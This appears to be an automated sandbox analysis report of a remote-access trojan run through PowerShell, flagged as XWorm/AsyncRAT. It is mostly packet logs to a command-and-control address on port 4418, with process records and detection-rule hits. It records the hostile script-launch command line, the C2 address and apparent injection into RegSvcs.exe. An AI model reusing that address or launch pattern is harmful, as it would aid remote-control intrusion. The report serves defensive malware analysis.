Jan 14, 2025 08:28:42.984114885 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:42.988985062 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:43.095818043 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:43.098047972 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:43.102890015 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:44.925972939 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:44.974931955 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:48.413074970 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:48.417943001 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:48.630199909 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:48.632499933 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:48.637501001 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:54.366735935 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:54.371671915 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:54.584188938 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:54.586258888 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:54.591059923 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:56.007085085 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:56.012336016 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:56.224581957 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:56.271815062 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:56.481043100 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:56.485958099 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:59.180643082 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:59.185565948 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:59.397392988 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:28:59.411701918 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:28:59.416574955 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.069139004 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.073988914 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.179419994 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.184365034 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.194319963 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.199208975 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.209624052 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.214529991 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.256639004 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.261451006 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.286475897 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.288599014 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.336863995 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.337042093 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.341928005 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.350189924 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.355092049 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.366161108 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.371154070 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.381735086 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.386665106 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.408688068 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.410805941 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.460910082 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.534909010 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.536689997 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.541541100 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.652679920 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.654484987 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.659440994 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.659497023 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.664335966 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.773665905 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
Jan 14, 2025 08:29:10.775816917 CET | 49714 | 4418 | 192.168.2.6 | 92.255.57.112
Jan 14, 2025 08:29:10.780690908 CET | 4418 | 49714 | 92.255.57.112 | 192.168.2.6
                                          Jan 14, 2025 08:29:10.780742884 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.785563946 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:10.785619020 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:10.790450096 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:14.930046082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:14.974946022 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.787766933 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.792623043 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:20.834606886 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:20.840229988 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.005625963 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.007582903 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:21.012453079 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.127307892 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:21.131335020 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:21.136183023 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.287770987 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:26.292613983 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.505737066 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:26.510277033 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:26.515146971 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:33.819051981 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:33.824090958 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:34.036600113 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:34.040662050 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:34.045600891 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:36.897229910 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:36.902200937 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.114629984 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.116024017 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:37.121001005 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.209723949 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:37.215818882 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.722425938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:37.739551067 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:37.744581938 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.194014072 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:39.199126005 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.411657095 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:39.415353060 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:39.420278072 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:44.932971001 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:44.992671967 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:50.383704901 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:50.388766050 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:51.180581093 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:51.225014925 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:51.250458002 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:51.256494045 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.366085052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:53.371278048 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.588912010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:29:53.591335058 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:29:53.596251965 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.709546089 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:00.714507103 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.926929951 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:00.932702065 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:00.937560081 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:01.834578037 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:01.839667082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:01.850212097 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:01.855052948 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.051886082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.053255081 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:02.058120966 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.201358080 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:02.202639103 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:02.207576036 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.081522942 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:13.086400986 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.305969000 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:13.307924986 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:13.312741041 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:15.214395046 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:15.256253958 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:20.931236029 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:20.936077118 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:21.148508072 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:21.193787098 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:21.244122982 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:21.248893976 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.350375891 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.355420113 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.589673042 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.591933966 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.596868038 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.741008043 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.745856047 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.980737925 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:22.984877110 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:22.989758015 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.287822008 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.292829990 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.353056908 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.357899904 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.397641897 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.402518988 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.505064964 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.506876945 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.511733055 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.553350925 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.558247089 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.628000975 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.629442930 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.634182930 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.749463081 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.750818014 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.755623102 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.871835947 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:28.873137951 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:28.878084898 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.709711075 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:33.714956045 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.927248955 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:33.929261923 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:33.934098959 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.709855080 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.714835882 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.740942955 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.745846987 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.756608009 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.761519909 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.927198887 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:44.929510117 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:44.934335947 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.048649073 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.178898096 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.179240942 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.180502892 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.185296059 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:45.185470104 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:45.190327883 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:55.947011948 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:55.951951027 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:56.914324999 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:30:56.916244030 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:30:56.921125889 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.553406000 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:00.558309078 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.770509958 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:00.774964094 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:00.779783010 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:05.944236040 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:05.949325085 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:06.161472082 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:06.163090944 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:06.167948961 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.350474119 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:07.356511116 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.568542004 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:07.570003033 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:07.574892044 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:08.834703922 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:08.839665890 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:09.051996946 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:09.053539991 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:09.058371067 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:14.979305029 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:15.131576061 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.506602049 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.511697054 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.537868023 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.542999983 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.724495888 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.726844072 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.731861115 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.846847057 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:16.848458052 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:16.853338003 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:21.959997892 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:21.965954065 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:22.178348064 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:22.187058926 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:22.192076921 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:26.865995884 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:26.871005058 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:27.083048105 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:27.084367037 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:27.089252949 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.069143057 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:29.074110985 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.286494017 CET44184971492.255.57.112192.168.2.6
                                          Jan 14, 2025 08:31:29.287317991 CET497144418192.168.2.692.255.57.112
                                          Jan 14, 2025 08:31:29.292058945 CET44184971492.255.57.112192.168.2.6
UDP packets

Timestamp                          Source Port  Dest Port  Source IP     Dest IP
Jan 14, 2025 08:27:53.653747082 CET  53           59502      162.159.36.2  192.168.2.6
Jan 14, 2025 08:27:54.135080099 CET  58723        53         192.168.2.6   1.1.1.1
Jan 14, 2025 08:27:54.142162085 CET  53           58723      1.1.1.1       192.168.2.6

DNS queries

Timestamp                          Source IP    Dest IP  Trans ID  OP Code             Name                        Type                  Class        DNS over HTTPS
Jan 14, 2025 08:27:54.135080099 CET  192.168.2.6  1.1.1.1  0xf8e     Standard query (0)  15.164.165.52.in-addr.arpa  PTR (Pointer record)  IN (0x0001)  false

DNS answers

Timestamp                          Source IP  Dest IP      Trans ID  Reply Code      Name                        CName  Address  Type                  Class        DNS over HTTPS
Jan 14, 2025 08:27:54.142162085 CET  1.1.1.1    192.168.2.6  0xf8e     Name error (3)  15.164.165.52.in-addr.arpa  none   none     PTR (Pointer record)  IN (0x0001)  false


Target ID: 0
Start time: 02:27:21
Start date: 14/01/2025
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\92.255.57_1.112.ps1"
Imagebase: 0x7ff6e3d50000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4A288000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4AEDB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000000.00000002.2168812433.0000021C4A4DB000.00000004.00000800.00020000.00000000.sdmp, Author: ditekSHen
Reputation: high
Has exited: true

Target ID: 1
Start time: 02:27:21
Start date: 14/01/2025
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff66e660000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high
Has exited: true

Target ID: 3
Start time: 02:27:24
Start date: 14/01/2025
Path: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit): true
Commandline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"
Imagebase: 0x760000
File size: 45'984 bytes
MD5 hash: 9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
                                          Yara matches:
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                          • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: 00000003.00000002.4565884702.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                          • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: 00000003.00000002.4568648694.0000000002AB1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation: high
Has exited: false

Target ID: 4
Start time: 02:27:24
Start date: 14/01/2025
Path: C:\Windows\System32\wermgr.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3728" "2668" "2508" "2672" "0" "0" "2676" "0" "0" "0" "0" "0"
Imagebase: 0x7ff794bc0000
File size: 229'728 bytes
MD5 hash: 74A0194782E039ACE1F7349544DC1CF4
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: moderate
Has exited: true


                                            Execution Graph

Execution Coverage: 2.4%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 7
Total number of Limit Nodes: 0

execution_graph nodes:
  5565  7ffd3488ef08
  5566  7ffd3488eec8
  5567  7ffd3488ef7a  ResumeThread
  5568  7ffd3488efa6
  5569  7ffd3488f550
  5570  7ffd3488f597  Wow64SetThreadContext
  5572  7ffd3488f654

execution_graph edges:
  5565->5566, 5566->5565, 5566->5567, 5567->5568, 5569->5570, 5570->5572

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd

                                            Control-flow Graph

                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID:
                                            • API String ID:
                                            • Opcode ID: 82fd8e7fa2f6ffef934c79e5e78dfb85b336bc59111aa82d15125c44d7f74af3
                                            • Instruction ID: 18dcbd915c761830af221c3c925d90aa9b7a79ab6ab2296e2d7df29e0ed45b7d
                                            • Opcode Fuzzy Hash: 82fd8e7fa2f6ffef934c79e5e78dfb85b336bc59111aa82d15125c44d7f74af3
                                            • Instruction Fuzzy Hash: 51712331A0C7880FD72A9F6858A50B87FE1EF57311B1846BFD58AC7193DA28A807C751

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID: ContextThreadWow64
                                            • String ID:
                                            • API String ID: 983334009-0
                                            • Opcode ID: 83a4f242200014ccb88908fba170dd44de4468928ae59352fba8a7120d1ed9c5
                                            • Instruction ID: 376fa9ff13d6ac8dea75f0f5d36d28e37283253d897ad2cb680b9d5465826607
                                            • Opcode Fuzzy Hash: 83a4f242200014ccb88908fba170dd44de4468928ae59352fba8a7120d1ed9c5
                                            • Instruction Fuzzy Hash: D641F63190D7844FD72A9BB858656E97FF0EF57321F0942AFD089C7193DB28680AC752

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.2198354057.00007FFD34880000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD34880000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_7ffd34880000_powershell.jbxd
                                            Similarity
                                            • API ID: ResumeThread
                                            • String ID:
                                            • API String ID: 947044025-0
